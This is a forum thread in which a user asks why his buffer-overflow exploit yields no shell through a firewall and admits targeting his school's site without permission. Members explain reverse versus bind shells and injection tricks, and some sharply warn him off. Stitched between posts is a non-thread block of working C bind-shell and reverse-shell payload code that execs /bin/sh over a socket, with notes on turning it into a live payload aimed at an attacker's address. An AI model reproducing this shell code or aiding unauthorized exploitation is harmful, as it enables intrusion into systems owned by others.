firewall and (POC)exploits
Thread: firewall and (POC)exploits

  1. #1
    Senior Member
    Join Date
    Oct 2004
    Posts
    122

    Question firewall and (POC)exploits

    We all know about exploits, although I must accept there are a few matters involved that I never understood.
    Say there is some buffer overflow in X server on a port and we have a POC exploit for that too.
    That exploit is either supposed to send a shell to a particular IP address or bind a shell to some port.
    We use that exploit and get into the vulnerable system, right?
    NOW, I have seen sometimes that although there is a buffer overflow that can be exploited in some service, when I use the exploit to get in it doesn't work. Why?
    The exploitable service I was exploiting was running on a particular port that I can't access anymore, meaning it is down because of the buffer overflow caused by my exploit.
    That system is running Network Blackjack on port 1025.
    So my question is: does the firewall have anything to do with that?
    If yes, then is any system having a firewall not vulnerable to exploits? (At least POC exploits; I know about DLL injection that can bypass firewall security.)
    In my case, when I exploit that particular server the shell is supposed to be bound on port XXXX, but when I telnet to port XXXX I don't get anything, although for some time after I exploited that service port 1025 was busy (firewall port). What does that mean?
    nobody is perfect i am nobody

  2. #2
    Banned
    Join Date
    Sep 2004
    Posts
    145
    I'm having trouble understanding you. I think the answer that you're looking for is that you crashed the service (the overflow) and didn't manage to deliver a payload (shell). This would tend to mean a bad exploit.


    Can you try to clarify a bit?

  3. #3
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    Well littlenick,

    You should be doing this sort of thing on your own systems that you have exclusive use of. Then YOU are in control of the experiment (environment, changes and so on).

    If this is someone else's system, or is shared...

    1. You should not be doing it
    2. They probably applied a few patches

    Remember, an exploit takes advantage of a vulnerability... once the vulnerability is patched, the exploit won't work. Also, there is the concept of multi-layered security?

    Or, as Winston correctly observed, the "exploit" was a load of crap in the first place

    You really must be careful asking these sorts of questions on this site... you almost came across as a skiddie asking for a copy of SubSeven.

    Cheers

  4. #4
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    When coding exploits, a skilled hacker can easily craft any type of payload he wishes to be delivered on successful exploitation. Honestly, in Win32 shells are not nearly as useful as on a *nix box, but if you just wanted to get through the firewall, a simple way would be to use "reverse shell" shellcode (start a session on the victim and actually connect back OUT to the attacker; even if some outgoing connections are blocked, port 80 is almost always usable) instead of a "bind shell" (where we bind our shell and listen). Of course there are many more subtle things to do, like replacing .dlls or adding accounts, that are probably more effective on Windows. As to your exploit not working because the service crashed, that is one of the reasons Win shellcode can also be a bit tricky. Even though your payload may have exploited the service and spawned a shell, since you crashed the service (the parent process under which your exploit is running), down goes your shell with it. It is possible to avoid this; one way is by making your exploit force the app to exit cleanly, but that's by no means the only way.



    -Maestr0
    "If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software." -Jaron Lanier
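
The bind-versus-reverse distinction Maestr0 draws, as an added example that is not part of this thread and is not anyone's posted exploit: both payload halves written in C over POSIX sockets, exercised against loopback so it runs offline. The address 127.0.0.1, the kernel-chosen port (0) and the `echo` commands are assumptions for the demo; a real payload would call `attach_shell(fd, NULL)` for an interactive shell and, in the reverse case, connect to the attacker's address. Note which side calls `connect()`: in the bind shell it is the attacker coming in (what an inbound-filtering firewall drops, matching the symptom in post #1), in the reverse shell it is the victim going out.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Bind-shell half: listen on 127.0.0.1:port (port 0 = kernel picks one).
 * Returns the listening socket and reports the port actually bound.
 * Loopback-only is an assumption for the demo; a payload would bind 0.0.0.0. */
int bind_listen(uint16_t port, uint16_t *bound_port) {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) return -1;
    int one = 1;
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    a.sin_port = htons(port);
    socklen_t len = sizeof a;
    if (bind(s, (struct sockaddr *)&a, sizeof a) < 0 || listen(s, 1) < 0 ||
        getsockname(s, (struct sockaddr *)&a, &len) < 0) {
        close(s);
        return -1;
    }
    if (bound_port) *bound_port = ntohs(a.sin_port);
    return s;
}

/* Reverse-shell half: connect OUT to ip:port. Outbound is the direction a
 * stateful firewall usually permits, which is why this beats a bind shell. */
int reverse_connect(const char *ip, uint16_t port) {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) return -1;
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &a.sin_addr) != 1 ||
        connect(s, (struct sockaddr *)&a, sizeof a) < 0) {
        close(s);
        return -1;
    }
    return s;
}

/* What either payload ends with: point stdin/stdout/stderr at the socket and
 * exec a shell. cmd != NULL runs one command (used by the demos below);
 * cmd == NULL gives the interactive shell a real payload wants. Never returns. */
void attach_shell(int fd, const char *cmd) {
    dup2(fd, STDIN_FILENO);
    dup2(fd, STDOUT_FILENO);
    dup2(fd, STDERR_FILENO);
    if (cmd)
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
    else
        execl("/bin/sh", "sh", "-i", (char *)NULL);
    _exit(127);
}

/* Read from fd until the peer closes, NUL-terminate, return byte count. */
static ssize_t read_all(int fd, char *out, size_t outlen) {
    size_t got = 0;
    for (;;) {
        ssize_t n = read(fd, out + got, outlen - 1 - got);
        if (n <= 0) break;
        got += (size_t)n;
        if (got >= outlen - 1) break;
    }
    out[got] = '\0';
    return (ssize_t)got;
}

/* Demo 1, reverse shell: the "attacker" (parent) listens, the "victim"
 * (child) connects back and hands over a shell. */
ssize_t demo_reverse_shell(char *out, size_t outlen) {
    uint16_t port;
    int lst = bind_listen(0, &port);            /* attacker's listener */
    if (lst < 0) return -1;
    pid_t pid = fork();
    if (pid == 0) {                             /* victim: payload runs here */
        int c = reverse_connect("127.0.0.1", port);
        if (c < 0) _exit(1);
        attach_shell(c, "echo connected-back");
    }
    int conn = accept(lst, NULL, NULL);
    ssize_t n = conn < 0 ? -1 : read_all(conn, out, outlen);
    close(conn);
    close(lst);
    waitpid(pid, NULL, 0);
    return n;
}

/* Demo 2, bind shell: the "victim" (child) listens and waits, the "attacker"
 * (parent) connects in. A firewall filtering inbound traffic drops exactly
 * this connect(), and the attacker sees nothing on the bound port. */
ssize_t demo_bind_shell(char *out, size_t outlen) {
    uint16_t port;
    int lst = bind_listen(0, &port);            /* victim's listening socket */
    if (lst < 0) return -1;
    pid_t pid = fork();
    if (pid == 0) {                             /* victim: payload runs here */
        int c = accept(lst, NULL, NULL);
        if (c < 0) _exit(1);
        attach_shell(c, "echo bound-and-waiting");
    }
    int conn = reverse_connect("127.0.0.1", port);  /* attacker's telnet */
    ssize_t n = conn < 0 ? -1 : read_all(conn, out, outlen);
    close(conn);
    close(lst);
    waitpid(pid, NULL, 0);
    return n;
}

int main(void) {
    char buf[128];
    if (demo_reverse_shell(buf, sizeof buf) > 0) printf("reverse: %s", buf);
    if (demo_bind_shell(buf, sizeof buf) > 0) printf("bind:    %s", buf);
    return 0;
}
```

The two demos are the same three calls in a different order; the only thing that changes is which host's kernel sees an inbound SYN. Watching that with `netstat -an` (or a packet capture) on the target, next to the firewall policy, tells you whether a silent bind shell is a firewall problem or a payload that never ran.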

  5. #5
    Senior Member
    Join Date
    Jun 2003
    Posts
    772
    at least POC exploits i know about DLL injection that can bypass firewall security)
    DLL injection is for bypassing outbound detection. It is also annoying because of the external DLL. Raw code injection is thus a better way to bypass outbound detection (see the latest Phrack).

    Win shellcode can also be a bit tricky
    *shivers*
    *el-half thinks it's annoying that DLL export addresses change so often in new versions*
    *el-half sucks at writing generic shellcode*
    *el-half sues Microsoft for that*
    The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post's content - me

    www.elhalf.com

  6. #6
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    I am sorry nihil, but I had to do it. See, it is my school's site and all I want to do is inform them of a security bug; they won't take me seriously if I don't have proof.
    I hope you understand. Anyway, after reading these three replies I have decided to make my own reverse shell exploit for this (I am not good at that but at least I will try to do so).
    I never got an understanding of shellcode but I don't want to look stupid anymore.
    nobody is perfect i am nobody

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    littlenick,

    i am sorry nihil but i had to do it see it is my schools site and all i want to do is to inform them of a security bug they won't take me seriously if i don't have a proof.
    They will take you seriously enough when they catch you... think about it. If you do not have permission, don't do it.

    You will not be thanked for exposing someone else's inadequacies, believe me!

    From the general tone of your posts in this thread I get the impression that you are not totally familiar with the procedures involved, and certainly don't know what defences you are up against. That is a recipe for disaster.

    Well, that's my advice anyway.

  8. #8
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    As much as I hate to side with the thought police, I have to say, if you're doing this to your school's computer you are a total jackass. No one is going to give you a medal, just expel you and take you to court.

    -Maestr0
    "If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software." -Jaron Lanier
